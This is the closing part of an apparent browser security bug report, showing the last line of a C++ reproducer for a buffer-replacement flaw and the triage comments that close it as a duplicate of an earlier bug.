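  return (!r.first && m.mDeferred == 1) ? r.second : -1;
}
```

Build with any C++11 compiler and call UnsafePathReplacesBuffer() and GuardedPathHint() from a main of your own; the first returns true (the nested assignment replaced the buffer under the loop), the second returns 3.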
Hiro, care to take a look?
Flags: needinfo?(bbirtles) → needinfo?(hiikezoe)
Sure. I suspect this is another variant of bug 1289701. I will check whether the patch for bug 1289701 fixes this or not.
Flags: needinfo?(hiikezoe)
Confirmed.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty-
Group: core-security